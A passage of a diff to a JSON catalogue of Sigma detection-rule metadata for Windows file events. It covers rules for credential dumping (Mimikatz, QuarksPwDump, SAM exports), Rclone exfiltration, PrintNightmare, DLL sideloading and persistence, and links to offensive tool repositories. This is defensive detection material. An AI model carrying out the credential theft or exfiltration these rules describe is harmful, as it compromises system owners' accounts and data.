"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_outlook_newform.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1137.003" - ] - }, - "uuid": "c3edc6a5-d9d4-48d8-930e-aab518390917", - "value": "Outlook Form Installation" - }, - { - "description": "Detects processes creating temp files related to PCRE.NET package", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/10/29", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_pcre_net_temp_file.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/rbmaslen/status/1321859647091970051", - "https://twitter.com/tifkin_/status/1321916444557365248", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_pcre_net_temp_file.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", - "value": "PCRE.NET Package Temp Files" - }, - { - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2021/05/05", - "falsepositive": [ - "Very unlikely" - ], - "filename": "file_event_win_pingback_backdoor.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel", - "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_pingback_backdoor.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1574.001" - ] - }, - "uuid": "2bd63d53-84d4-4210-80ff-bf0658f1bf78", - "value": "Pingback Backdoor - File" - }, - { - "description": "Detects the creation of known powershell scripts for exploitation", - "meta": { - "author": "Markus Neis, Nasreddine Bencherchali, Mustafa Kaan Demir, Georg Lauenstein", - "creation_date": "2018/04/07", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_powershell_exploit_scripts.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://raw.githubusercontent.com/Neo23x0/sigma/f35c50049fa896dff91ff545cb199319172701e8/rules/windows/powershell/powershell_malicious_commandlets.yml", - "https://github.com/PowerShellMafia/PowerSploit", - "https://github.com/NetSPI/PowerUpSQL", - "https://github.com/CsEnox/EventViewer-UACBypass", - "https://github.com/AlsidOfficial/WSUSpendu/", - "https://github.com/nettitude/Invoke-PowerThIEf", - "https://github.com/S3cur3Th1sSh1t/WinPwn", - "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", - "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", - "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", - "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", - "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", - "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", - "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_exploit_scripts.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", - "value": "Malicious PowerShell Commandlet Names" - }, - { - "description": "Attempts to detect PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", - "meta": { - "author": "Christopher Peacock '@securepeacock', SCYTHE", - "creation_date": "2021/10/24", - "falsepositive": [ - "Unknown", - "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." - ], - "filename": "file_event_win_powershell_startup_shortcuts.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://redcanary.com/blog/intelligence-insights-october-2021/", - "https://github.com/redcanaryco/atomic-red-team/blob/36d49de4c8b00bf36054294b4a1fcbab3917d7c5/atomics/T1547.001/T1547.001.md#atomic-test-7---add-executable-shortcut-link-to-user-startup-folder", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_startup_shortcuts.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", - "value": "PowerShell Writing Startup Shortcuts" - }, - { - "description": "Detects a dump file written by QuarksPwDump password dumper", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/02/10", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_quarkspw_filedump.yml", - "level": "critical", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/QuarksPWDump.htm", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_quarkspw_filedump.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002" - ] - }, - "uuid": "847def9e-924d-4e90-b7c4-5f581395a2b4", - "value": "QuarksPwDump Dump File" - }, - { - "description": "Detects Rclone config file being created", - "meta": { - "author": "Aaron Greetham (@beardofbinary) - NCC Group", - "creation_date": "2021/05/26", - "falsepositive": [ - "Legitimate Rclone usage (rare)" - ], - "filename": "file_event_win_rclone_exec_file.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_rclone_exec_file.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1567.002" - ] - }, - "uuid": "34986307-b7f4-49be-92f3-e7a4d01ac5db", - "value": "Rclone Config File Creation" - }, - { - "description": "Detects actions caused by the RedMimicry Winnti playbook", - "meta": { - "author": "Alexander Rausch", - "creation_date": "2020/06/24", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_redmimicry_winnti_filedrop.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://redmimicry.com", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_redmimicry_winnti_filedrop.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027" - ] - }, - "uuid": "130c9e58-28ac-4f83-8574-0a4cc913b97e", - "value": "RedMimicry Winnti Playbook Dropped File" - }, - { - "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", - "meta": { - "author": "SecurityAura", - "creation_date": "2022/11/16", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_remote_cred_dump.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/Porchetta-Industries/CrackMapExec", - "https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_remote_cred_dump.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003" - ] - }, - "uuid": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", - "value": "Remote Credential Dump" - }, - { - "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut. If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder. Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.", - "meta": { - "author": "Greg (rule)", - "creation_date": "2022/07/21", - "falsepositive": "No established falsepositives", - "filename": "file_event_win_ripzip_attack.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/jonasLyk/status/1549338335243534336?t=CrmPocBGLbDyE4p6zTX1cg&s=19", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ripzip_attack.yml" - ], - "tags": [ - "attack.t1547", - "attack.persistence" - ] - }, - "uuid": "a6976974-ea6f-4e97-818e-ea08625c52cb", - "value": "RipZip Attack on Startup Folder" - }, - { - "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/02/11", - "falsepositive": [ - "Rare cases of administrative activity" - ], - "filename": "file_event_win_sam_dump.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/search?q=CVE-2021-36934", - "https://github.com/cube0x0/CVE-2021-36934", - "https://www.google.com/search?q=%22reg.exe+save%22+sam", - "https://github.com/HuskyHacks/ShadowSteal", - "https://github.com/FireFart/hivenightmare", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sam_dump.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002" - ] - }, - "uuid": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", - "value": "SAM Dump File Creation" - }, - { - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "description": "Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.", "meta": { "author": "frack113", - "creation_date": "2022/02/13", - "falsepositive": [ - "Legitimate use" - ], - "filename": "file_event_win_screenconnect_artefact.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_screenconnect_artefact.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "fec96f39-988b-4586-b746-b93d59fd1922", - "value": "ScreenConnect Temporary Installation Artefact" - }, - { - "description": "This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.", - "meta": { - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", - "creation_date": "2021/08/23", + "creation_date": "2022/09/05", "falsepositive": [ "Unknown" ], - "filename": "file_event_win_script_creation_by_office_using_file_ext.yml", + "filename": "file_event_win_susp_executable_creation.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", - "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_script_creation_by_office_using_file_ext.yml" - ], - "tags": [ - "attack.t1204.002", - "attack.execution" - ] - }, - "uuid": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", - "value": "Created Files by Office Applications" - }, - { - "description": "Detects a Windows executable that writes files to suspicious folders", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/11/20", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_shell_write_susp_directory.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml" - ], - "tags": "No established tags" - }, - "uuid": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", - "value": "Windows Shell File Write to Suspicious Folder" - }, - { - "description": "Detects windows executables that writes files with suspicious extensions", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/12", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_shell_write_susp_files_extensions.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_shell_write_susp_files_extensions.yml" - ], - "tags": "No established tags" - }, - "uuid": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", - "value": "Windows Binaries Write Suspicious Extensions" - }, - { - "description": "A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/05/02", - "falsepositive": [ - "An FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate" - ], - "filename": "file_event_win_startup_folder_file_write.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/12", - "https://threathunterplaybook.com/evals/apt29/detections/5.B.1_611FCA99-97D0-4873-9E51-1C1BA2DBB40D.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_startup_folder_file_write.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "2aa0a6b4-a865-495b-ab51-c28249537b75", - "value": "Startup Folder File Write" - }, - { - "description": "Detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.", - "meta": { - "author": "xknow @xknow_infosec, Tim Shelton", - "creation_date": "2019/03/24", - "falsepositive": [ - "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc." - ], - "filename": "file_event_win_susp_adsi_cache_usage.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961", - "https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/", - "https://github.com/fox-it/LDAPFragger", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_adsi_cache_usage.yml" - ], - "tags": [ - "attack.t1001.003", - "attack.command_and_control" - ] - }, - "uuid": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", - "value": "Suspicious ADSI-Cache Usage By Unknown Tool" - }, - { - "description": "Detects suspicious .NET assembly executions. Could detect using Cobalt Strike's command execute-assembly.", - "meta": { - "author": "omkar72, oscd.community, Wojciech Lesicki", - "creation_date": "2020/10/12", - "falsepositive": [ - "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" - ], - "filename": "file_event_win_susp_clr_logs.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", - "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", - "https://github.com/olafhartong/sysmon-modular/blob/5e5f6d90819a7f35eec0aba08021d0d201bb9055/11_file_create/include_dotnet.xml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_clr_logs.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1059.001", - "attack.t1218" - ] - }, - "uuid": "e4b63079-6198-405c-abd7-3fe8b0ce3263", - "value": "Suspicious CLR Logs Creation" - }, - { - "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", - "meta": { - "author": "frack113", - "creation_date": "2022/01/21", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_susp_colorcpl.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/eral4m/status/1480468728324231172?s=20", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_colorcpl.yml" + "https://app.any.run/tasks/76c69e2d-01e8-49d9-9aea-fb7cc0c4d3ad/", + "https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_executable_creation.yml" ], "tags": [ "attack.defense_evasion", "attack.t1564" ] }, - "uuid": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", - "value": "Suspicious Creation with Colorcpl" + "uuid": "74babdd6-a758-4549-9632-26535279e654", + "value": "Suspicious Executable File Creation" + }, + { + "description": "Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/06/29", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_cve_2021_1675_printspooler.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/hhlxf/PrintNightmare", + "https://github.com/cube0x0/CVE-2021-1675", + "https://github.com/afwu/PrintNightmare", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_1675_printspooler.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.resource_development", + "attack.t1587", + "cve.2021.1675" + ] + }, + "uuid": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07", + "value": "CVE-2021-1675 Print Spooler Exploitation Filename Pattern" + }, + { + "description": "Detects Mimikatz MemSSP default log file creation", + "meta": { + "author": "David ANDRE", + "creation_date": "2021/12/20", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_win_mimikatz_memssp_log_file.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://pentestlab.blog/2019/10/21/persistence-security-support-provider/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mimikatz_memssp_log_file.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ] + }, + "uuid": "034affe8-6170-11ec-844f-0f78aa0c4d66", + "value": "Mimikatz MemSSP Default Log File Creation" + }, + { + "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded\n", + "meta": { + "author": "frack113", + "creation_date": "2022/08/12", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_iphlpapi_dll_sideloading.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iphlpapi_dll_sideloading.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", + "value": "Malicious DLL File Dropped in the Teams or OneDrive Folder" + }, + { + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", + "meta": { + "author": "Sittikorn S", + "creation_date": "2021/07/16", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", + "https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" + ] + }, + "uuid": "ad7085ac-92e4-4b76-8ce2-276d2c0e68ef", + "value": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum" + }, + { + "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. Which could be indicative of UEFI based persistence method", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/18", + "falsepositive": [ + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + ], + "filename": "file_event_win_wpbbin_persistence.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://persistence-info.github.io/Data/wpbbin.html", + "https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wpbbin_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1542.001" + ] + }, + "uuid": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", + "value": "UEFI Persistence Via Wpbbin - FileCreation" + }, + { + "description": "Detects the creation of log files during a TeamViewer remote session", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/30", + "falsepositive": [ + "Legitimate uses of TeamViewer in an organisation" + ], + "filename": "file_event_win_susp_teamviewer_remote_session.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.teamviewer.com/en-us/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_teamviewer_remote_session.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "162ab1e4-6874-4564-853c-53ec3ab8be01", + "value": "TeamViewer Remote Session" + }, + { + "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", + "meta": { + "author": "C.J. May", + "creation_date": "2022/08/09", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_bloodhound_collection.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://academy.hackthebox.com/course/preview/active-directory-bloodhound/bloodhound--data-collection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_bloodhound_collection.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "02773bed-83bf-469f-b7ff-e676e7d78bab", + "value": "BloodHound Collection Files" + }, + { + "description": "Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", + "meta": { + "author": "frack113", + "creation_date": "2022/05/09", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_werfault_dll_hijacking.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.bleepingcomputer.com/news/security/hackers-are-now-hiding-malware-in-windows-event-logs/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_werfault_dll_hijacking.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.001" + ] + }, + "uuid": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", + "value": "Creation of an WerFault.exe in Unusual Folder" + }, + { + "description": "Detects creation of template files for Microsoft Office from outside Office", + "meta": { + "author": "Max Altgelt", + "creation_date": "2022/06/02", + "falsepositive": [ + "Loading a user environment from a backup or a domain controller", + "Synchronization of templates" + ], + "filename": "file_event_win_word_template_creation.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://insight-jp.nttsecurity.com/post/102hojk/operation-restylink-apt-campaign-targeting-japanese-companies", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_word_template_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137" + ] + }, + "uuid": "0e20c89d-2264-44ae-8238-aeeaba609ece", + "value": "Office Template Creation" + }, + { + "description": "Detects Octopus Scanner Malware.", + "meta": { + "author": "NVISO", + "creation_date": "2020/06/09", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_mal_octopus_scanner.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_octopus_scanner.yml" + ], + "tags": [ + "attack.t1195", + "attack.t1195.001" + ] + }, + "uuid": "805c55d9-31e6-4846-9878-c34c75054fe9", + "value": "Octopus Scanner Malware" + }, + { + "description": "Detects the presence and execution of Inveigh via dropped artefacts", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/24", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_win_inveigh_artefacts.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", + "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs", + "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_inveigh_artefacts.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", + "value": "Inveigh Execution Artefacts" }, { "description": "This rule detects suspicious files created by Microsoft Sync Center (mobsync)", @@ -24047,178 +25004,191 @@ "value": "Created Files by Microsoft Sync Center" }, { - "description": "Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder", + "description": "Detects anydesk writing binaries files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it's highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that's part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)\n", "meta": { - "author": "elhoim", - "creation_date": "2022/04/28", + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/28", "falsepositive": [ "Unknown" ], - "filename": "file_event_win_susp_default_gpo_dir_write.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://redcanary.com/blog/intelligence-insights-november-2021/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_default_gpo_dir_write.yml" - ], - "tags": [ - "attack.t1036.005", - "attack.defense_evasion" - ] - }, - "uuid": "5f87308a-0a5b-4623-ae15-d8fa1809bc60", - "value": "Suspicious Files in Default GPO Folder" - }, - { - "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/07/03", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "filename": "file_event_win_susp_desktopimgdownldr_file.yml", + "filename": "file_event_win_anydesk_writing_susp_binaries.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/", - "https://twitter.com/SBousseaden/status/1278977301745741825", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml" + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_anydesk_writing_susp_binaries.yml" ], "tags": [ - "attack.defense_evasion", - "attack.t1105" + "attack.command_and_control", + "attack.t1219" ] }, - "uuid": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", - "value": "Suspicious Desktopimgdownldr Target File" + "uuid": "2d367498-5112-4ae5-a06a-96e7bc33a211", + "value": "Suspicious Binary Writes Via AnyDesk" }, { - "description": "Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", + "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut. If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder. Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.", "meta": { - "author": "Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)", - "creation_date": "2020/03/19", - "falsepositive": [ - "Operations performed through Windows SCCM or equivalent", - "Read only access list authority" + "author": "Greg (rule)", + "creation_date": "2022/07/21", + "falsepositive": "No established falsepositives", + "filename": "file_event_win_ripzip_attack.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/jonasLyk/status/1549338335243534336?t=CrmPocBGLbDyE4p6zTX1cg&s=19", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ripzip_attack.yml" ], - "filename": "file_event_win_susp_desktop_ini.yml", + "tags": [ + "attack.t1547", + "attack.persistence" + ] + }, + "uuid": "a6976974-ea6f-4e97-818e-ea08625c52cb", + "value": 